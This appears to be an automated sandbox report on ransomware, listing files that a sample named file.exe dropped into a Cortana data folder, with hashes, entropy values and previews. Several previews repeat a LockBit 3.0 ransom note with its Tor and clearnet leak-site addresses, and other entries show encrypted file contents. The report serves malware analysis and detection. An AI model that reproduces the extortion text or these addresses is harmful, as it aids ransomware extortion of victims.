                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{844f5f98-087f-48ac-8c1f-1efdc9f3f424}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{94fd83ea-55f6-4a66-95d5-64315122fb92}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{9a11bead-4a31-4027-b6a3-4965899ddc4e}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{bff69808-bf5a-45c4-83b2-159e16a88092}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\apps.csg.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):512
                Entropy (8bit):7.573880629125079
                Encrypted:false
                SSDEEP:12:QXMT6cR0vEartfYzYrwir/gMjBthPBv2JbD2VJNAWnM+i+9BVzd:QZOaBmwYMjNBv2RD2HNAX+i+9BVR
                MD5:4F7F49360C8108F71E461F11DE266BD8
                SHA1:58B54BA0692F8030B596731BDC7F3D06B8C2915E
                SHA-256:1C9CE15783514C7B07B727A0186739165AE1B3FD84CC6206159BB613B88A943D
                SHA-512:B33FC7A0ABA57FF2B4BD6E7569D808221CED089E7A226A477BA1DDA79A6D85BFEE9FC8D41D6956ED021A8535AD913C97748F62FB443CFB74090D5F5114E71344
                Malicious:false
                Preview:.bP..M..;.......H..W..fpe../.&t....i%l....... ....)v..}....0)...b.[....NN..-..q...>..C..&K...n_.2......u..L.C.*...........hI.....lG.G.z....}(j.W.......2g....s.......1../......T.2.]Lcl...:\K>..q.~...e.Y.h,.....C...$....#..E..!1..>d...mdE.!.2_Z....1...Yn....b..~~i.^/....... ./q.@..rY..z..i..D.Q.xJ.V._..E.,w.x..s...4..S4.....>.J...<RT....[A.D,.\...j.0'..b..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\apps.schema.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):387
                Entropy (8bit):7.436345765256877
                Encrypted:false
                SSDEEP:12:qhWxZ8eE1+FoGzvarbaIbcpd/D2VJNAWnM+i+9BVzd:qhWxZwz+KbnStD2HNAX+i+9BVR
                MD5:E9FCA394B36CF1F87A20500F889A8203
                SHA1:28CCC96C38D1568E0F028B99AB3DA2800BAE0FA4
                SHA-256:11910501E9C13B9E66527647935CBE9973FBC6459E46C0B0A0FBF605AD576063
                SHA-512:B863A0EDFB14017177FB0307A0049DD98566956268ACB2650CE601AD902AB8B55E5658809BD24A21795B85D861364C99A9D31E82A2E5BC59D7CD8B8AA02801A6
                Malicious:false
                Preview:l&.Fg.-OU.u..8..X..0,].z...Gg....... .].....4W..Z.R(.]..,...#.......e....=.N%..mh..|..+.5.7.. ..p....q..,.......E.....h%.g) ]:..*....#..01.!....j.v..^/.....+....B-(^.p...zU.i..G.Q.<..3.A+m..-}.M.......F.-...]PP.7...y.-.`..J.......NT.6.M.1H..g..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsconversions.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):31830
                Entropy (8bit):7.9946709923521535
                Encrypted:true
                SSDEEP:768:7wJg+HJ6FoH6GNlj6i0bZ+gJIE7efBv2GNf8mOG:09pZHlW1bZ+Lf12GNf8u
                MD5:BEDAF14802B4E79BF92083FD8A233567
                SHA1:A436525D07F841720D390B555272FD5A94EE1EF7
                SHA-256:FD61D3C7FB5C4334F001AE3E282E534941FC5AABDE7DAAEEF2E5A85CC011198F
                SHA-512:CD60015DD3D540A94C32B2479D2E121432979C4B4BF145026F0542ACAD72CED7D9B9C7D986D87A9323FB8BD3718E259152DDF097E8DC3DB61C15B730CB231F70
                Malicious:true
                Preview:ip..~.....R\.}..jI..M.........J...z.5&.d.O#..2>..+-.7..EG5x....a...*.....7..2....q..`k.=.I$.../6..........J..k...$.I....Rg.ktS..~?...g.._B{.M;.op....H...fk^s..y....4K.:x...o,8.Y.7.........=...b4.*.9U$..}..x.@....B...w<.,Z....>.xD.......{>..$.P=Q..T.:...Y.;.>..g.o.....`}.*..1Q...]d.?.....w~5.x(83c.b..$S...I..4.`.S."...V...U.m.{...t..2...:@..........F.....'..r....3\..g,.......n...5..K.t........#.b...............?.[`.N>.....'..y'`ze...2..&......z..W...Fpcm#..{......f<z/..M..{w"|f.q[..vZ.!.8.Q.7.a.s...El.4..........S&..s...>..w.z.~.......G...ev.........XLs.?mQ......k]. .k..%....0..8..0AZ.,%Y.^.5'.....7...9Rf.Uh.~...x.z.....E.l=Bt"./..O.7... R.Q>...Y]..Q..n07%.._..3./..LQF)c.\q.Pz..|....h..T.D..T..4.V..E&..4+..2WV.t.X....fC.|.U...at}.'...w.._.........A..*.{......y......dO..*.$...,T...}..X<..18B.~...44...lt;..H..e...d...Vs.(.u...V..pw..gL..sI.g.".`R..}g.c.?]..&.....b]J..qx...<2f. ..{.2.g.(.Td..j.3..'.X. .U.....e..x.<..r..C....4_..w.#...Z

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsglobals.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):358016
                Entropy (8bit):7.9995520200260595
                Encrypted:true
                SSDEEP:6144:8ZxEXP/gat98BChaPsQx4uEd/2YY/phzFtJNnYRpXvgpRj2FX7Ofz+IPNbxrY:8ZxEXP/gEiEhaPgvmzzFFY/957OffFby
                MD5:6FDBC94F784FE561CC15F3795F57664F
                SHA1:8A42F0B06A7481D00134F0279B004AC6B552F1C6
                SHA-256:38AB5CD3EEAFD6776C6E9554B34ECC7563DE05132CD45D455C3E0A8CC4F15A16
                SHA-512:CC835E00A3583471D4472A811DAD601D33DD0C3B0796F0539115CCAC1E3D65EE133683F253A6D669AA4945F999276D61ECE21762FF7FF23A6608374EA650091D
                Malicious:true
                Preview:D.`..I.6.^.?.$.f..{m}......}...&E.L.[6..|...Y...Z&..D...U..0.gD&...m....3..-?..is.Wi.)m..5]..3..8.2y"4W.i....w.......2.ZQFY#3g.....|*.Mm".g.J..k.S....o.......h....(9.I..n,OhF.%N.o........:....>AdN0(..k...h..O.......#.....gz+....|Z...............K=.B....CA.......!..S..I....\....`;....vu/h........V...|..q.....vJY...MKM..H'.<.f../...r.N.6..0,.'.DLYGV...l.A...*l.gi....X.2a.b0y......>..c...a...s....n..|.:,.99...\.& ."#......x...3.._W.O.e&.....<=^...q.....o....@.."..g...o......}.f.U{.....U..H.+..K.].....]%u.X.]..$........9...)Y...BI.I.M....w.F..5..7.Ae.........qP..........r....e~a.%...@..........C..q...l,z.P.....%.t............'...d;.6.P\...Ss$?<.o.80...0..PaA..9....H.$E2..(R]S.47.`...<....h2.+..d....Q._.....>......]....L._$......%..I..P.Y..@..!3B...}.+..H.^.M)...F..q....}5..C.B<....[.....J.mE..*..#N.<..u$.N.i...q....f.....q.X..A.\....... c0k.v..W..]7...Q}..0.....;..!C.l.Qo..7..1p.M.?...j......R7}.|.V......eQ.v..=\..PH$m...c>EI..f.D

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appssynonyms.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):81485
                Entropy (8bit):7.997797775461396
                Encrypted:true
                SSDEEP:1536:gTC49BJ7zlpDIukerGu26VzouOMPHJKRp65ZrioMBOkRsJoTrHuoNj0RQ:gp3curyuBzMIHJKDmQostqJ4iqj0RQ
                MD5:06AE22A7E1E0000D8FFCA8FD4F0D7B3F
                SHA1:FCF5FBE27414F41AE7E7D331F43375DE3ADDF271
                SHA-256:8BBE1AC9A9AA26B964D27E581B3915F3BC903C6146B5386E1A7B50929F6FD8D3
                SHA-512:BBFCBECFEE775563D7735E231D759069F4326B2CAE8D62297D4F2B509397EB3682D2CC4D59FAB87A958982BE4DF1E392118BC5B2490CD232F6F6E8C8556A549D
                Malicious:true
                Preview:4V.]..#_:t\.w..Ie.........!q+.S=@WX..$JZ...TH...._..!.a.C+....>....x..KQ......7u.G.J.j.....a.$.....l.aO._.?k?....*.~...S.1].5".Vf..)gx...M.D)...z_|.l9nt...E.-!p.f.+a3.w..G..~....t.&...%@Tv<..x.@[...+wG7..@...4.Q..0@;O..x<.J.,...ZB.ND.~...t....z.d.....}..R.t..~...%W.d..LCD..U...=z.6.t.:......d.d ..VD%r.^!B...........r...*.2.?.%m$l.>.g..\...J...I-.3.`....wJ.X...l5tN.......b...-.W.~W.....G.H.*...\.....$....'....}8.X..8 o..7...?l6[|\...j&vML^. .A..\;.V.h.'..pCH..A.^DW....S+.Ke6...';*{..9..'_...P..Ux.B.....GDPJ@.(.*G..4.k.E.d.0.".@...N._XD........+t...:..I.FD....Y.b.............|;_q.50....5..[+8.....0.I.4.Z...F....h..c.*.6.v!..O>g1.g...K..g_.. D.3...a.....p...)....E._.m.`.``.".f."!..AB3ha.....VA.E;. .~..G.{.A.......(.....D~..LFaPt....%....:...;....{..;....}D..S.;...........0n.."YN..a..*.I..ml..$WU....l:..L...........{2.b.P...N=b^K...G..[.+>..M..Y.a.....{.T5:......;C..`$kO..0...:...<...6y..V..@..d.....q..X3.u.:..A^A..M.....Hk.Y.....S.F.`u`z.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settings.csg.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):529
                Entropy (8bit):7.586135114715441
                Encrypted:false
                SSDEEP:12:cpNkEFuzlCiAwNt0/mEFMo1em2SQHD2VJNAWnM+i+9BVzd:gF0zYANC/uzHD2HNAX+i+9BVR
                MD5:A030EA0DDC04F1B9C1FE88955ED3662B
                SHA1:97E4B455F10348A4EEAD780B4909B1DC635058F0
                SHA-256:D00FD147C84D2E0C5522AC51B77AC42E2DA9D8E5AFCC99FA7867D0251D0DF9F1
                SHA-512:253B8C00512BF755D9D7082F89E8D91A9AF881FB5AECEC43F757A837D41A8E3157E130AB5AAD7C5D5D986C3B7863104663293EEDAAE308EB1FB521FD20DCEADB
                Malicious:false
                Preview:;N...`...}..6.z.`9..].....dc.E.....x.Q..a.q..H]+.x.C.W.uF2..q..Y.=2.........P.qn......:.@.....$Z(..K.f.._..!.+_.o.u?@......mb..!...r..3...)..4...l.K...Io.7.FG.+...m.M.c..G2yL..8.e.(%.....K.s.N.{..W._..*..fg035$.(.>..(.4}}...N..#2.......=.3c.K.Jg.....d......t+.[2LY..=..=.Y.*..^:.d..X,.#.....^.f.q.z..;..G.Q.<..0...X.*.d<...(` >...==5..7x..e._. #....."...[.....*`..l.`o._.c...ji..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settings.schema.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):406
                Entropy (8bit):7.504033417292158
                Encrypted:false
                SSDEEP:12:0Rwbnm5O03YQWKc/C/3AD2VJNAWnM+i+9BVzd:0WX0ontmAD2HNAX+i+9BVR
                MD5:57BD7CC7737ECF7E696F5525E7A38C60
                SHA1:586C9D9A71A55B908A12B90763A26357EF4397C6
                SHA-256:052E6773219CA39FDF942769CA198D243E7CE57B1D06BBD864AB7C182041237F
                SHA-512:43F75E83006878FCB62F946296C7DCE53915B4D5F31EEB6F8BDB66115EB6BF8099E5A878492A7D1722E134130C5580988970967BFC84BE1530B42993763AEA74
                Malicious:false
                Preview:..t..}$...-(...AY. .i1<....%.B.x....;G`Y..<..$.....I?.....*....u<....Ph..O~.).6...?.0Q..IpR#...{O..5....w....o_*.....!...,.....}sIa.,X...N.xi.D.......... ..^:.d..X,.#........&.0.g.i..G...<..3....@.h..... .8L.].....lmP%W#...;J)....6..B&.NS5....[wW+h.<.YM..o.".....n..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsconversions.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):31833
                Entropy (8bit):7.994737885605369
                Encrypted:true
                SSDEEP:768:3IjGZ7JMJd2+ijpgR1x6pen6lBdrUXyfI5l:3gWWrGKien95l
                MD5:58F40469EC6C08AA07310CF31F4E178E
                SHA1:501FAB1868C29BCC896F399C6B1E99BA2A15BD36
                SHA-256:B935341F1FBC7187344A0AE12BCD7E3B75ED2B2FE31264303E9E48BDF0DF63CB
                SHA-512:82FB3C22206448E44817AA2363A65866BE1D3D647079D0EBA20D755D7B7F6743D9DE4B7ABE1BF1C38DDC11DDF85E01C7586B172F6EC11AD4D9F141453987E562
                Malicious:true
                Preview:..z.&...^..h..c-^<.1...a..,..o.~.(..I..k.?.m'.......'..V..]...1...\CW9...:k.nM%Q...9.m..S#.c......SvZ.-..s..._.7.^..{._....hx6.U..:r.H.1..Tp...u..'i^p...,..H3.b>.....0...zo.."X1.6.]B|...$....[(5i..R.(.]...Fc..NS.-}...{....5..F g..U.U..7./u.E..S.m>a....t....t.4..P.P..y..p.R...~+{C..h....H........(..;D5.yT...;.k.6.>&...%..^B"....{....Uu..g.._H..Mx.l.....R....c|..{/../.Y.....[..7...l..e.Oy..$..T.%.*.d(.AlSu..... A.h\.@...TL..QR4.Y..].ORE......-<hm<j......5[..?y.R:.Rv.W=S.A....FD..{k.k..C..ME"...5.J..|`..F(_N/VL....@R........7.......`.3.:.:.I/..TaW..r.W[:.a#....\:.../.......M...v..h..v.J.....D..;..n.o?.?...O.....Wngf.=...[..O(.}.........+.. =..J;|.^.,..]sj...L)X....W...5[o[6.l..X.$..:..p..y........j$.a...1M......WPv..f.$.......r..V#..s....c...Qj.o....r.^R.(Rq.s..yk8.W..........n..&zk....:..........Z..s..G......a.A .....D.".....`Y.....{.......hK7..d....5.z..."..v.D....T...[..bK0..5iW.....6.....2gt..Ft...D.g...?2@0....T ..R. h..\...x..."......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsglobals.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):40728
                Entropy (8bit):7.995849302375403
                Encrypted:true
                SSDEEP:768:Y1Rp9dDg/LcsH2NWaDihQ5Z5TEy8sk/15dYl9BmltTCZt3sL/a:YPpHDoxTaDp5T8sk/1olDcU3sja
                MD5:B90A8FEE3549E047C47DFC15778DA8E4
                SHA1:2C51770AB1A30801EFDCFDF471535F700D21721E
                SHA-256:0D9CEBE29E92CD1120A33EC83A585FAE65E33238DC359B1EBC434E7A9C1B6096
                SHA-512:D4729D84C1DCC68E3C994E7FE33EAB3A88853AD1C2EF4DC8355215B4D756FE9A052F87ACD56EEFA58EC47E72D91FD813A50863DBE419CEC211F8D98D8E5DADE1
                Malicious:true
